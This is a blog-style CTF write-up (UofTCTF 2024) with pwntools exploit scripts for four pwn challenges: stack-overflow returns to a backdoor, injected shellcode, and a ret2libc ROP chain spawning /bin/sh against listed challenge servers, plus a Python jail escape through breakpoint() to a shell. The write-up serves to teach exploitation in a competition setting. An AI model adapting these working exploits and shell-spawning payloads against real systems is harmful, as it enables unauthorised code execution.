nyyyddddn

uoftctf_pwn_wp

ctf writeup
2024/01/18

pwn

basic-overflow

有一个shell函数,栈溢出覆盖返回地址为shell

1
2
3
4
5
6
7
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[64]; // [rsp+0h] [rbp-40h] BYREF

  gets(v4, argv, envp);
  return 0;
}
1
2
3
4
int shell()
{
  return execve("/bin/sh", 0LL, 0LL);
}

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./basic-overflow')
libc = elf.libc

is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.123.15.202"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


payload = b'a' * (0x40 + 0x8) + p64(0x401136)

sl(payload)

p.interactive()

baby-shellcode

emm没有输入大小是 0x400,直接用shellcraft吧

1
2
3
4
5
6
7
8
9
10
11
12
public _start
_start proc near
sub     rsp, 400h
mov     edx, 400h       ; count
mov     rsi, rsp        ; buf
mov     edi, 0          ; fd
mov     eax, 0
syscall                 ; LINUX - sys_read
jmp     rsp
_start endp

_text ends
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./baby-shellcode')
libc = elf.libc

is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.28.147.7"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


payload = asm(shellcraft.sh())

sl(payload)
p.interactive()

patched-shell

和第一题 basic-overflow一样的,有一个backdoor函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./patched-shell')
libc = elf.libc

is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.134.173.142"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


payload = b'a' * (0x40 + 0x8) + p64(0x401137)

sl(payload)


p.interactive()

nothing-to-return

binaery里面没有useful gadget 那可以去libc里面找嘛,直接给了printf的地址,不需要leak printf了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./nothing-to-return')
libc = elf.libc

is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.30.126.104"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


ru("printf is at ")
printf_addr = int(rl()[:-1],16)
libc_base = printf_addr - libc.sym['printf']
success(f"libc_base ->{hex(libc_base)}")

rdi = libc_base + 0x0000000000028265 
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
ret = 0x000000000040101a


payload = flat([
    b'a' * (0x40 + 0x8),
    ret,rdi,binsh,system
]) 

print(len(payload))

sla("Hello give me an input",str(len(payload)))
sla("Enter your input:\n",payload)

p.interactive()

jail

Baby’s First Pyjail

1
2
3
4
5
6
7
8
9
10
11
lhj@lhj-virtual-machine:~/Desktop/uoftctf/pwn/nothing-to-return$  nc 35.226.249.45 5000
>>> __import__('os').system('sh')
try harder
>>> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
ls
chal.py
flag
cat flag

Author:nyyyddddn

Link:https://nyyyddddn.github.io/2024/01/18/uoftctf-pwn-wp/

Publish date:January 18th 2024, 4:16:25 pm

Update date:January 21st 2024, 10:29:14 pm

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. pwn
    1. 1.1. basic-overflow
    2. 1.2. baby-shellcode
    3. 1.3. patched-shell
    4. 1.4. nothing-to-return
  2. 2. jail
    1. 2.1. Baby’s First Pyjail
Total : 32
2024
2023
Invalid date
2024
2023
ctf writeup